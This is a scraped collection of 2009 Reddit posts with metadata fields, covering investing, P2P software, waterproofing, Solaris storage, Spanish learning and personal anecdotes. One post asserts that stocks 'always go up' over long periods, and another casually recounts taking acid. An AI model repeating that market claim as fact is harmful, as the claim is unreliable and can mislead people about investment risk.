Products you will rarely hear of. Forget it.
This is a rough introduction to MOST of the traded products on the investing market. As a beginner, you will only trade stocks. You can lose 100% of your capital on options (on stocks too, but hopefully you will make nice picks ;)). Plus, generally speaking, over a long period, stocks always go up. We will look later at how to choose stocks. | r/investing101 | post | r/Investing101 | 2009-10-21 | Z0FBQUFBQm5IcUlYWHhfRmIwdlN5UXZQSWpjRl93a0sxWGFsZ0pNTXNDRmNDbWdtYUgtUnhOdlAtZTl3amRlTl9TbUFxYkl6MndSbjllWWtURmpmaEV4b1ptakUzUVVUdFE9PQ== | Z0FBQUFBQm5IcUowUmZHV3hxOEFuNDBfcGctdHd3U28wVWVOSnBvd20xcVR5cjI2a1p0b1ZxUlVfMVJ2Nks1U0o5WmgyUUVsYWFHS3Y2OEV3M3ROaFBodFg4eGliblMzS2o1R2JqWjRrZW5pZlZJalh3bTBxN19JTV9NMDRvWTNYbTVibkJFVFJDalcwcjVCekQ4aXFKQmlXdng2MGRMeS1oMEJQVEZ6T0xncVlYTXA5VnJnQzZ3PQ== |
I've been using it for a few weeks, and even though there isn't an enormous amount of content yet, I believe it could well be the next big thing in P2P.
A usual argument against F2F is that they are inefficient. What I've noticed from using OneSwarm is that since people aren't afraid to share, it can actually be more efficient than other technologies where only very few people share stuff.
Also, I like the way you can manage your "Friends". It's very easy to detect leechers and remove them. I believe this has the potential to make it perform better than bittorrent, too.
Anyways, I'd like to hear the opinion of other redditors. Do you agree with me? Is there something even better that I haven't heard of yet? What will the next big thing in P2P be? | r/p2p | post | r/p2p | 2009-10-22 | Z0FBQUFBQm5IcUlYelJFYXgwZU1ZQ0VqOVR4VHpZSDNWV0Iza0thaUY1cDRxdEMxemxtLUc5cU5sVkF4VjNDUzJFSzNoLUQ1cjZ5YmVoZGNSRUFiT2hJVDRoN0U3NF93a2c9PQ== | Z0FBQUFBQm5IcUowSHdBSDM1MFVFQ2lXbkJObmRuS1NUR0xJRDhwNDR0TWRpcWZCcE5PcjR4ODZMcnd6U3JzM0x1LTZlcE9ieENyRGlwU3FUcEp0OHY5Q3I0SnRwNG14NHUxejlEaHJlNjhQQVk3SGlvQlEzZjBJWjJKTGZTdTlxTjNhaTZIZTByemZqajNONGlQZXM0cXJOSlZuZExUcXlKZ1NwUUpJZlhfRUJ3N3J1WGtfQU1jPQ== |
Usually when companies waterproof a leaky basement or when they build a new house all you get is a thin spray on mastic that is supposed to protect your basement from taking in any water due to cracks in the foundation. This is a poor man's option (actually this is a rich man's option because poor people can't afford to have their basements excavated multiple times). Instead go for a high end option like Platon System or Delta. Those membranes last for decades and protect your foundation walls much better but will only cost you an extra several hundred dollars on top of a multi thousand dollar project. Don't skimp out that last and most important step. Get a dimpled membrane around your foundation walls. It's not much more money but the protection is worth the extra 10% of your project cost. | r/tipoftheday | post | r/tipoftheday | 2009-10-23 | Z0FBQUFBQm5IcUlYTnp3eFBhcHp6MWZQcHBVbWpXSnNIbVA3czUxdFdzaTdJc3JsU2Jkaks5RExWc1FWMWNZejAtOWlyTjQ4U19OZXlFUUVYSGRpeDJYajQtUkFVVm5HTGc9PQ== | Z0FBQUFBQm5IcUowS0cyd3dKbThfR1hwMG1xN3poQnpZcG5TdTlJMExla1pzRUFrN3JET0lZSFQyZEV1SnlFSWoyd2kzVk10WUhOd2lmay1xREFUN2JhM05JcjVncjZmU3RtT3FuUE5SQVdwMGZKRGlDbFBlUVFrMGp2N0VseXBSQnA3REVDMmxWZkhsNnY4M0FXY1ZkMmFTMmpGQXkwRFM5ci1iTDZ3eVBiZ2ZRTmU5Y1B3MW5ReE1IOTJzOUJPeDg0Y2lsZFpzU3Vpb0Q3QnFsMzRod2xYZ0pQQ0VmbF9wZz09 |
Cascading—Chris Curtin, pig/hadoop at twitter; | r/nosql | post | r/nosql | 2009-11-01 | Z0FBQUFBQm5IcUlYdnVoSWllREhjamRJWWdPaHdYbjRjUm16SUJPajhnMERHbGtTdlVnSHVETy15alhCNE1Hbk4tR0s1LXBSR3FPWFBxOUhBVVNZYVc3NGZjb2pPOHBYREE9PQ== | Z0FBQUFBQm5IcUowLWM5NnMteTZTcGt1QUZrUFVkY2VMUXgwYXlCWGNBRU91V0s1Z1JQRzhvY2tWSFdjZXRJeUFYRlNjSnpTZENibUxjS3lMVXFGTlhTSFQ2cUpfcExyNldmcXlnRldKQ2JXbk0td2RsUWJwZWJwaFhvVm82VDJzOHYyanYxOVlHVkNOeTdVTWliT2hPb0QwbFM3RXdjc1gxbldJN2hhbGdRNTlHNW1NaFNidk5VPQ== |
Post your favorite ESL links. | r/tesl | post | r/TESL | 2009-11-04 | Z0FBQUFBQm5IcUlYTm1QVVF1M2MybWZQbW9naElSWnFqUlNabWhIeVJuRjhNU3ZHeVROM0VLcWtxVkp5M2gzYUJJakJreDV2U0NwdGhaY0UyU2pWS2l1Wl9xN3lNMU5hTUE9PQ== | Z0FBQUFBQm5IcUowbGR4SG9QWnFmTzlHSGVjNnJDWF82bG1obmg0R3ZUNmN2NEdnTEhlQnpmYURwRnY1aXlUWmZ2bHQxcUlZYTYtMkZ3TkZjRjJMbjZaTDFiRGtBcjJjV0kxbjJ4aFM1VGdpN2s2N29jdDhtTnpZRlJaZHlsSGxXTzdtdXVqbmllSlk5cFN6cW9fTjNqUTBvQndCZmhqVW5EVDhKUEx2SlNScVgxTWxOdHdUaEFRUmRCUFotcE9iUk1HTEkxUFdoTk9a |
Don't blame the printer if you don't have enough business acumen to make better decisions. If you walk across broken glass barefoot, you can't blame the glass when you get cut. | r/print | post | r/print | 2009-11-04 | Z0FBQUFBQm5IcUlYaGRpSHdZUUxPV3FwTjdaSlFsTHkwTDQwaGhsVGc0NVVTX1RvUGJwOVJWX3ZSZ1R1ZW01NHZIbHZ6VFJBTDFCRHcyaWtEcDhhbTZhMmtXeTQzalVPckE9PQ== | Z0FBQUFBQm5IcUowUWlwc3lNVGUwWHlBWExEZ1A2bWxPeHBldXMxZUlXbjFCTlVnUURVLWR5ZUU0X3VmUWpUTnh1cU1GT0FpQzhUWFFoNHE5bk4wbHJiT2Z4OEhBSE5BRU9XT1hycFgzc2VwZTRLQ3Q2MmQ2Z2NYY3pZX2p4Q2YydFp6U1YxcXJlekxhNHA4UTlZcTJQVGJNSXRXRHdHazAxdFB5dUFLYzVDa2VMRjRfdXBzaVppNzJNN0IwUmh1RDZlSWl2YUZNcjdE |
I have been interested in this for some time... I know of the Giclée prints using an inkjet printer but I wanted to see if there was any information some of you may have in reference to screen printed pieces.
i've got absolutely NO graphic ability and would really appreciate the help...thanks, guys! | r/logo | post | r/logo | 2009-11-05 | Z0FBQUFBQm5IcUlYN08xMEJnT01TWVllQTlxQVVhMk5UUzRQVVYyeThrM090djVvQmNyTUdjMmpzUVkzX1hRN3R4enpkcENGTE1uQ1libVJrc3FGT1VkcXhDVGZRQ0w5R3c9PQ== | Z0FBQUFBQm5IcUowUEQxWEpPWjRER0lXWEVGdUtUc0RSUTFxZGtCem1BZjlMQ1FDSW9YQ0RWRWR0STUyUFUyeEc1Nm1FV2JqbjgxSWtVc2dweUh3MWxsWWh2YVFyenBFb1FvNUlDSWhBdTRTaWZDckdVS0JmdDNtckdmTUVqNkNRV0Y3S01scVFFTkJWbHczUjVwUV90LUZjMGV1eTg3X012M2luOEdPZ0JYRm1kbkRVM055dFlSUmdnM3pqX0tLSzRFQkdHUmdxY2Zl |
Almost every nosql data store out there hails "scalability" as a key feature. That's all good, but there are quite a lot of applications that should work fine on a single server: blogs, wikis, intranet apps, bug trackers, etc. Heck, even CRMs and ERPs for small to medium businesses shouldn't need a cluster.
Can you guys share your thoughts on using nosql databases in such scenarios? | r/nosql | post | r/nosql | 2009-11-05 | Z0FBQUFBQm5IcUlYdVlmd2hXOGk5bzVGbG9rYzE5c2NqVnBXalN2UjgzNnhqenFIZ1hhY19fZmdpMngtOW5leU1Nb0pKSm8wNGI2S1drR1ZMTFd3Z3R3MDRQUUpUR18xM0E9PQ== | Z0FBQUFBQm5IcUowZnBfaDRhZXgzeF9HN2pwaG5CLXoybVhIbzlfZ3dsZXFFbkxHLVd5ZGZ4Ym5YdWJKSGQyeXdaZy1uUGVjSHZZZjhMcW11X0tfbHBzeTgtcmhJZ1k3NkNFOC1uTFMtYk0yVVpqOC1SWG5saU5xdjFDbjJtc2xjMldSMExldVpCSmpRX1E0cFE4ZUVmQ1kzS0NXZ3VTN1FDQXdKMEZVcG8yTDRtS0lZSVQzaGIyMFpOaHdrUW1VdUtXbXNEejdlOW5s |
I started getting this ready for my media room and decided that AM in my area is crap and I can never lock down any good shortwave stations when I need them so I decided to see what I could do to get some modern hardware to play nice with it.
The tubes and wiring are original so I really didn't want to have to cut anything if I didn't REALLY have to. I built a little AM transmitter but the quality was trashy so I needed a better route.
The phonograph plugs into the back of the radio body in what can be best compared to an AUX port (mono, like the rest of the set) so I unplugged it and checked for voltage - none.
I butchered up some cable plugged it in. What you see here is not the final work - just the prototype. As long as the MP3 player is set to about 50% volume and the bass is turned off the audio is great. Above that and it starts getting drop off.
[Here](http://imgur.com/nK2mW.jpg) is the beast with it's new little friend.
The [heart of the beast](http://imgur.com/nmE6p.jpg)
Yes, that is [War of the worlds](http://imgur.com/knEZv.jpg), Orson Welles' 1938 radio adaptation - Halloween night was awesome listening to this by the glow of the dial.
Now I can pull out all my old radio shows and play them in a manner befitting them. I sense an X-minus one marathon coming. :)
| r/madscientist | post | r/madscientist | 2009-11-06 | Z0FBQUFBQm5IcUlYcE16Y2xjTVZUTTZ4Y25MUWxqaV92cHdIYURMWG9jLVdYdlJOS2ZsQVRZYzJBTFNYMEE1YWZibldxTXM2NEdFOU9kaXNsa1RfZUZzWEVOTXNDeC0wQmc9PQ== | Z0FBQUFBQm5IcUowR25lbWxKbTNVMnAzRm1pRmJ1anBqdk9sYUJRYVNBaTVDS3dkMWx0MXdrSlJza3Z3TWN4VG9LS2dCaXZPS2U2NTF5MXhBMVRMS1QyV2lIZXVfbnYwXzF4S3ViOXhOcUlyeHFHd1c5SmhlWUdNV1VGV3hTazlmOE1jMF93bUZhZzh2X2Mzb2NjMTh5bTc2dGd3RzBOV01GTVJCNm9SLTRlci1oaktHNXhwNUhCTm5lOGtZZmZvaXJtX0pqZlRrQlJKeldvZ3BRZEFfalhiMFRkRW1WZWZLQT09 |
Here's a repost of my question:
I have Solaris 10 [10/09] installed on a Dell R710 with two Dell SAS 5E HBAs that are attached to two SuperMicro SC846 JBOB chassis that have the SAS-846EL2 backplane. This is going to be a ZFS based NAS box.
After testing several configurations and swapping drives around in the backplane, my drives are showing up like this:
0. c0t0d0 <DEFAULT cyl 8921 alt 2 hd 255 sec 63>
1. c0t1d0 <DEFAULT cyl 8921 alt 2 hd 255 sec 63>
2. c1t26d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
3. c1t27d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
4. c1t28d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
5. c1t29d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
6. c1t30d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
7. c1t31d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
8. c1t32d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
9. c1t33d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
10. c1t34d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
11. c1t35d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
12. c1t36d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
13. c1t49d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
14. c2t50d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
15. c2t51d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
16. c2t52d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
17. c2t53d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
18. c2t54d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
19. c2t55d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
20. c2t56d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
21. c2t57d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
22. c2t58d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
23. c2t59d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
24. c2t60d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
25. c2t61d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
I'd like the drive numbers in the system to match the hardware slot they're in. [E.G. have controller 1 start with c1t1d0, and controller 2 start with c2t1d0. Since this system isn't in production yet, is there a way for the system to reset everything in /dev?
If I'm being too anal about this, just say so. All opinions are appreciated.
**Edit:** What I'd like to do is have the system completely forget the drives on c1 and c2 in /dev and start like I'd just installed the OS. | r/solaris | post | r/solaris | 2009-11-10 | Z0FBQUFBQm5IcUlYSUZkQ2wxdF9aSVBkM3lrelhIaHZlbEFtNFFUc3BaUk9kVXlFMU1OVUpwZzd0T181NnpJX2JtMTNjc2k5MFRQSmJjTG03RUpHcEZmYzhxREdSV0xzUnc9PQ== | Z0FBQUFBQm5IcUowN1Mza2xITmF0UzNWUHEwbjAxeTI5TE9TazV1QjNZZVlxLU9oWEFmRWNfd25YaVllbUZ0bG5ZSnBoeEtBS1c1SGxsNkdMdmFMRktlWFBqYmc1ZDBTT042TzBrOW5vYzFTaFB3NGZNQTE5SGNtNDdFM2RTdEtqbkhhRERrUjg0QnJObDM3UkNnNjdqQlo0SkotaUhya1h5akdiLS1QRnNPYzRCaU9oSEtXeHpaa2pRT1ZZQ3JacWZaYnNab3NRMnBXNmFLdmFFZTYxTWJfM0RVenVMVFJTUT09 |
Hi there,
I am not a programmer, and I don't really plan on becoming one. I just need to get this assignment done. And I am stuck at one thing... How do I make C to scanf a word (and then handle it later in the code). Example:
If someone enters "reddit", I want it to print out "is great". How do I do it? (I know how to do the latter, I am having problems with the "scanning" of "reddit").
Thanks. | r/c_language | post | r/c_language | 2009-11-11 | Z0FBQUFBQm5IcUlYMExTQ0RXcEM2N3ZxM2RxTEl1YkJVWXhKMFNxMWhXWHU4Z1JWdG40SjhhVnJNbEtPSHlldF9Qa0h4ZFdWeGhrVVVYaVNxSGp1VG1Dd0FXamdsWTlnbGc9PQ== | Z0FBQUFBQm5IcUowLXdnT1RELXVzVXZOY3R1UzJycDVPQTB4Z0RLeEVmQVFSNk80SGtNWGFWOXk5U2o4TFd1cXNBLUxqekJwVTQ3NU4wNnlCYWZ6cUtESjNUbkF3V1NnT3hwNHc5dkxsM2JJRllraTVIRmpOMW9HbGtiQmpXTFFWVGlSaFZ2M1VzNmFQLTkzXzk0YzZuOGtGZjJKWVU1SGU2NmtPRTBBZ2NOQ3BOc3pmZ255MlZJPQ== |
Met up with a good friend at a [bar](http://www.yelp.com/biz/stetsons-famous-bar-and-restaurant-washington) last night and we got blotto on [Affligem Blond](http://beeradvocate.com/beer/profile/196/620). It was my way of thanking her for setting me up with a job interview that I bombed. Then we walked a good mile back to her place since the Metro had shut off and the whole way I kept pimping Reddit to her, since she's smart and witty and likes all the things I send her way that I find here.
(Why? Cause it's a collective of nerds like us that tell awkward jokes! And they like narwhals which are like unicorn dolphins! And there's a DC meetup this weekend at this place called [The Science Club](http://www.scienceclubdc.com/) which I mean it seems to be just a bar that serves expensive hummus but it's got "Science" in it's name so that's cool! And there's a subreddit for every disparate interest and it's got a clean user interface, and, and... "you're a girl! You'll get like, ELEVENTY BILLION COMMENT KARMA!" True story, I said this exact phrase. Screamed it, really. I told you I was blotto.)
Anyway we got back to her apartment and I immediately jumped on the computer and went on Reddit to give her concrete examples of our stellar senses of humor and dorkery. Couldn't figure out if anything on the frontpage was good or not.. because I was drunk.. so I went to my own page and my most recently submitted comment. I then read the [OP's original story](http://www.reddit.com/r/LastNight/comments/a50uz/scrabble_a_gw_story/) and [my addendum](http://www.reddit.com/r/LastNight/comments/a50uz/scrabble_a_gw_story/c0fvpej) in a silly voice aloud - I'm told it was a mix between Grover from Sesame Street and [August Strindberg](http://www.strindbergandhelium.com/absinthe.html). It was funny at the time!
Then my friend is reading the title of the post - specifically the "(a GW story)" part. "Wait, what about GW?" She went to a school with those initials. "Is from my school?" Yeah no, it's just from another subreddit. "Are you sure?" Totally. It's in reference to GoneWild, the subreddit where people take their clothes off. "Uh..." Yup.
And I don't why but -- here, I'll show you! I go to /r/GoneWild and since the pictures are all transparent and small on her tiny laptop, I click a random link. And so the night and my friend's grand introduction to Reddit came to its logical conclusion. With a photo of some Redditor's erect junk staring back at us from our screen and her laughing at me. | r/lastnight | post | r/LastNight | 2009-11-17 | Z0FBQUFBQm5IcUlYaWZWNHJRQlpGaEVteS14UzgzdHRzcTFfNkdYcms0U1dlalVVTnJTWWR0UGpfbWZsT09SaTJJOThjTGYwOTcyd3ByNHpLU2ZBV19HR2ZtdzExS3BYZlE9PQ== | Z0FBQUFBQm5IcUowWlh3eUJYdTdTZko2M3FSVmVnall5V0dvY1ZtZFR4YVprdUZMbTVTcWgxaGgxd3EtS2M3ckZvMURnQW9ENDZrcXVxQkFSX09iVFJfa3k2XzByLXFIaGNSN1VBM2VjeS1kTGprUE1EdzZFMk9JaTk5YmhfbXN4N3h1WXN1ZGQ4N0dJaHcyeFRHaV9qN3k5N3VpMVppdVQ0STV5VG5MQXBoUFgyZzl1Ni05N1BYRDFBRXM1aUVqTEc0aDNycnBjME0zTGRXZ2dFWDV3LXNuellHcE41Uy1oZz09 |
Last night my friends and I went to an 'astrology park' a real low lit, low tree line, open field that just went on for miles. It was an old abandoned military landing strip that hasn't been used in years. Out of the 4 of us, three ingested two hits of acid each, sat back in these beach chairs we brought out, played music from the car, and watched the sky. It was beautiful, thousands of meteors flying over head, we began to name some, give them back stories on where they were headed, fleeing home to be with their meteor family, rushing back from a business trip from mars, and some just trying to see how fast they can go on the interplanetary high way C-38 (Celestial-38). The entire night was spent rolling joints, passing bowls, and making smores over a small campfire we had set up that all of us were sitting around.
Wish you could have been there to see it. | r/lastnight | post | r/LastNight | 2009-11-18 | Z0FBQUFBQm5IcUlYS2pfRHB3ank4dUdyZEtqNEpSOWUtV2pLQjYza0pZaTBrT2JUZXpZbVBzS0lSVXl4RTZ1VTlrc3NzTDh6WmJCZEFPRVdXMTFOZVphT0pyajJ6UTlaVGc9PQ== | Z0FBQUFBQm5IcUowTUtBeXhLeXNoSW5aa19ad0w4cmVQQ0hEb3ZhS2hJcFViZDQ4LXFtektodlI3dHN0VUFMczRIbFBpUVNnUHJCMExBSXBNLVhTVGZQb2x1UEs3ZmdUUldMeEh2RTBGOEc0ZXdoZm1ySklnbU91b3BWdjlXSzlMSkpCa2lHeXpjdU5aR1Z1S0ZwVHJOeTBndDBoVVUyZGsyQU8zY3hwSl93SnlhaW1ENUw1VG83SjJBbzRkVXJ1c2l5UE4ybXJiSGEwQXFaeThzN0FsNWtaRUxIU0ZqQXh1Zz09 |
welcome to /LANL_spanish here you will find all the help that you need for learning spanish.
Im Luis, im colombian feel free to use this space i created for your spanish needs, anything you can do to help would be greatly apreciated.
please post any questions you have.
feel free to PM if you would like to get some asistance with pronuntiation.
| r/lanl_spanish | post | r/LANL_Spanish | 2009-11-23 | Z0FBQUFBQm5IcUlYb2Fqb045SGZRaXhkRndITzVKNWdCdDZqdHl6M3FPUUpjODk5SzBoY1NybGU2R1FIZHpKek1DcW5Vb1JiUUFrdTVpTlBLUmFScS0ydTM2Qy03TlcxMVE9PQ== | Z0FBQUFBQm5IcUowVDdVUWQ3TnYzN09aT0pTTDFOaGpGaEZkclNZdktSQnB3NDdaVUFZa2FsVmJrSHJWRE1iVUloUXNqd2V1bm9hNVE4NVpzSE05Y0FOM3JfYjM0V1pWUTIwRGM1QU9nTXFPTUZfdm9zNWFjSUdjdkk3TkZPS0xlNGptLVpoWDlfelQwcnl6NUowRDFyVGdsRHloT2hTNTRRRFVGbDBGSVNfSFN4UzRzOXZfSTlZPQ== |
hi here i will try to cover the very basics of spanish.
**first person singular**: I/Yo.
**first person plural**: We/nosotros.
**second person singular**: You/ tu, usted.
tu is used when the subject is familiar to you.
usted is used for formality (meeting stranger, bosses, etc.)
**second person plural**: You/ ustedes, vosotros.
usted/ vosotros ( depends on the region in latin america we use ustedes in spain use more vosotros.)
**third person femenine singular** *plural*:she *them* Ella *ellas*
**third person masculine singular** *plural*:he *them* El *ellos*
these are the basic subjects.
There is also one more point to make regarding subjects in spanish the subject can be implicit or explicit, meaning it may not be at all in a sentence to be correct. | r/lanl_spanish | post | r/LANL_Spanish | 2009-11-23 | Z0FBQUFBQm5IcUlYSWlXOVRLY3VES20tMUxRQURQR1dxYkM4NXdWUXI1NGFOZVNDdVhFZWt4TzEyODh5UmxOeW5BLXNTcTJuSVpvR2ltN1Q1RFd5SWdWX2lBeS1oQk5STWc9PQ== | Z0FBQUFBQm5IcUowcUJHcGMtcHZ2dUJPMktQNzhPMjBDVXdOSXR0Sm9VcnlGNUowVGxYTm9leXBWYzUyQWo4TDM3SV9hRGJvZVlPaVlHQWR2Wjd1a3pvYnd1dzl2RTY5STUtMmJWLWFHcGFoUm1mYWxjdXgzTFczc3dVdEFFazVVQm9SYjZfMVVaMGtlbENCWVhfV3J0dlRaSk0tcEVWWTFibXVkVXBieFhvR3J4NFJHUlNLMFV3PQ== |
Hi all. I'm from Spain, and I'd really like to help you in everything I can. If you have any question about the spanish language, ask here and I'll try to help you.
¡Adelante! | r/lanl_spanish | post | r/LANL_Spanish | 2009-11-23 | Z0FBQUFBQm5IcUlYV1ZiNU1LSnBJRkN4aVNUdDBkaVJpSkxvbFFONXRRMjF6WjItQ09ETVBxSmdiSUs0SHJqblY1cG5NN0o2Ym52UjJFZ1hBNzgwOWJzWXFleDQ2VE1Sc3c9PQ== | Z0FBQUFBQm5IcUowWEtEekdaT0Raai1yUE9yTVB4MFduNlctUmNGOVhiSG9wYjF0UTZSYWM4VkxWQTFZSXhuLU1UZG15YnctcnpKZXlfN2ZZZEUwQ3d5ZC02ZEEyLWEzYkhGb1puX3NWdFFKSkhDcDAyRFNkQzRBLVlVUDRqdUR0UWpQMUFBZVVNRUxmdTZpSi1UMV9HbUV0Y0hERjladzBsRnhwVVVSZW1oaXNreVZ5V1ZyQ1RKMmcwY0duVm5vRm1BTDVLQmd1ZEo5LXVJNlJTeWprNlFMT2p4T0N6ZzRSQT09 |
Hey, I currently live in Spain and I am eager to learn Spanish, however I don't want to spend a lot of money on a course...anyone have any good tips on self teaching/free online resources?? | r/lanl_spanish | post | r/LANL_Spanish | 2009-11-23 | Z0FBQUFBQm5IcUlYRk5NWVFMR3VRYVhrYUx2Q1pxVmtTR1FzbjVEcG1qdERzM2VVM0w4U2k1ZnBSOVllQ25hNk5fZ1Q1VUZEaFBKenJOdGhmX19JeGFlSDRyWXdlaXFCOUE9PQ== | Z0FBQUFBQm5IcUowVEJUcERuTXFFanp5YVVFZVVuR2FpNzNBN2Y5bHp5cldqVXZBLUd3NjdnWElPN09rcm5SYmRfMG1fX3ZfYmVYVURCRG0xa3l2dTY5ekdWOUJkbk44TnBkRGtmSnN6bVZqZjkydUFsamIxamItaGNKZTlDWXFjZGJjbFVyT1pVYWdNV2lyR2FIYUhYb3Z5OFV6aTJqNmdLQUJBOFB6ZC1EQmktM3dfRGcxeDBVaTFJamlJZ0o4ejc5cXJJeW11MmpPejNUQXNJd0pjUTBhMjIyTmYtYmwzUT09 |
I have some conversation CDs that I listen to that are a great help, but the same old conversations don't teach you much after a while. I did find one pretty good [podcast](http://www.notesinspanish.com/category/intermediate-spanish-podcast/), but it is Castilian Spanish and I'd rather be practicing Latin American (specifically Mexican) Spanish. | r/lanl_spanish | post | r/LANL_Spanish | 2009-11-23 | Z0FBQUFBQm5IcUlYUGVVM1hXaVA4SlV3RDZnR2tHOHg4N3NnUy1ybWR2b3VXZWl1VkIzUDlJTXBWdXJWdXpZaTZVVjI3V2RVWW1FdmZ3Q2ktdUVuOU1URWc0SmMxcDU3V3c9PQ== | Z0FBQUFBQm5IcUowTkdDczR2Z0hyOUpMMlRrUDdKWldtZk9kYmt0ems3Y1loWGhrRWcwemd2VHltYmFOWFNadHgzREZRNUJBc2Q1ZTdNNTlRN0hnS183NjRzMFNhS3RHZndrUDMzTWRRV29Ydk5tNzRQMVlyVHdpN2JKX252WW9paGhnRVExSklGM1JJSmRuZV9PQjA1ZXd4cUtVLThBUDBWMDY5LUNKMkVVUXBBaGhwcmhIaVVUb00wNG15Vkx0R0QwRU5GT1ktNkZCYmRkVGZ0NzJ3bmVkeFlkVlZIY19rZz09 |
I'm just completing Spanish 101. I have almost 2 months until I start the next semester, and I feel like I'm going to forget everything!
Also: I hate verbs. | r/lanl_spanish | post | r/LANL_Spanish | 2009-11-23 | Z0FBQUFBQm5IcUlYaXN2SjhsX0pXUWY3TVVSQzdNNzh5Rm1MeXE3cGVsNUdrRmpNZFdzQUQ2VFZnMzRmdjQ4X0twX2hvRkNoelhtVG5NOVljZkZ3MXFOb0VZenRfN1oyMlE9PQ== | Z0FBQUFBQm5IcUowaEdxUDNYYWRfMUZLZUJKZGFwN1l2QmZ3QzBiVl9pa1NtV0VEakRTMFVRYWJmSjBuVnVCTzRpemI2NWhjX3Y0Ylphem4yWjEtRmxYUjlESjB1WGdYaWNRM3ZlalBPNEJrWTUwUHdzckpUVWVaWDk0Tnlkby1EM3BWTVB3SXpmV2tKYjI3clhXSmE4MDFuNW56UDFyNzNJNXBPOVFTWUNFRGJEeDZxM1dQRUk2Qzl2T0dEV1JaYUtuZEppOE8tMWJLUGU0cDFwMEVhQ3hWQW9MeS0wNXdNZz09 |
Something I wore actually a week or so ago... but just wanted to put something in this reddit to get it started, and hopefully get the ball rolling: http://imgur.com/GpwcS.jpg
* Muffler - Base Station
* Jacket - BLUE LABEL by United Arrows
* Jeans - Cheap Monday
* Shoes - Black ConverseChuck Taylors
* Tote - YSL Yves Saint Laurent | r/waywt | post | r/WAYWT | 2009-11-26 | Z0FBQUFBQm5IcUlYX3lCMzgzSTJWcTVlLWIxNFYtVEpxeEVPMi16Wmh0eEJ1N25zZmN2cWl0RTVBcmxMcFNKY3ctR0gyUGZZb0pZeTR6NXFKSlJLR2NLMUxBaTd3RFNsVEE9PQ== | Z0FBQUFBQm5IcUowa0gwQWt2VGo1TjRqYl9XZVZ5Q2lEVE5ZMkpua2JjNDdqTWxPTFQwZEp0Q2pXNjM5TjVwbFRob1dIdVZFNG0tb0toa3J1XzJlX3dhdVBkcFBmOXRFbFpxYTdVSkNMbFgtdldETC1aaUhlN2pxZHpWajYyOUhPZGltdDRSbE9UVzc1UGtaMmdEY2ZHbk5uX0VGUjNFd0hiTHc1ZkNWVEJBZVl0ZEJXb2J2M1I0PQ== |
I'll try to write at least one post like that per week. If I see you keep solving them, i'll add more to this post.
I'll increment the level each week. I hope you like it!
If you want, you can add some more exercises in comments ;)
*My name is Javier, and my favourite colour is blue*
*What's your name?*
*I really like his car*
*I don't like dogs, but I love cats*
*I am suscribed to this subreddit because I want to learn spanish*
*My friend Jose Carlos has a cousin in Colombia*
*My grandparents were born in the capital of Spain*
*There are many countries where people speak spanish, so I want to learn the language to speak with them!* | r/lanl_spanish | post | r/LANL_Spanish | 2009-11-27 | Z0FBQUFBQm5IcUlYQmxCTFVpVUE5YkJ4eDJqdjliTHVPdjdVSHB0SmxrTkJrZGhtOHNCOF94eDJWZTFzUlNvVm9tdFlDVjlOMWZMVy1YXzdTSVJJQXBtbE9ldTA3SnoxUUE9PQ== | Z0FBQUFBQm5IcUowVW16Rkc4WklabTAzNzZ4UnJVWXBhdWswd3BaVHI1VDR6aTdiaWhQZmx4N0xycWdVTFptYmd2NWNEXzhDVXVXWm5qLVZUQXM0RHhmeno3MENXYk9hQmlXSkc5eDZyU3MzbmtwR3FrUDZGUFVuQTRZMXNMVDI0M1BsRHZjUS1DX2wtNFplX3ZxdGhJYnZ3RmpNajZraDNiVW1OeFJTRkhEUlRCZmx5ZjFKQlZJPQ== |
I've been using the Pimsleur method to try to learn Spanish. Although it works really well in helping me pick up the language intuitively, it barely glosses over the technical aspects.
I've been trying to figure out phrases like "me gusta," "quedar me" and "me voy," and how they would compare grammatically in English.
So, "me gusta" means, "I like". So Does that mean te gusta means "you like"?
What's the difference between "te gusta," and "te gustas,"?
What's the difference between "me gusta," "me gusto," and "me gustas?"
| r/lanl_spanish | post | r/LANL_Spanish | 2009-11-27 | Z0FBQUFBQm5IcUlYTjI2UUp6ZDJIUGZzRGp3V2h2Z3ppNU9HUGg3ZGxFUWdkQXFvUEJFbjR3SGJ0clQ1bHptVGFRaFloUjlsS1NEbW9wS0tXeHlBVk1kVUNZejROQ1E5eFE9PQ== | Z0FBQUFBQm5IcUowVXVyQ1lyNVpLRFJnRlFUU1ZTQ21qOWhndmg0cTI1UlRGWGdvWHczQktDVkQxRk5ScWk1dEhZQ0h4X3BqYTVFVUhlT2xwandWUGh3SVZiM2JFNjBsRGVqdjJ5QzNqb09KbGRTd3VCTEhIZmk5NlJZMmxjallXZFRua2FDeW10QkZFSHpuNVdXR2lMODVqd1ZubFU5NUxfY1Y5My15UTdTRHFFak9kR2JUY3hZPQ== |
Ideally this sort of thing needs to be brought in from the top, both in the public and private sector. Who are the people that need to be convinced that LFTR is a completely viable option?
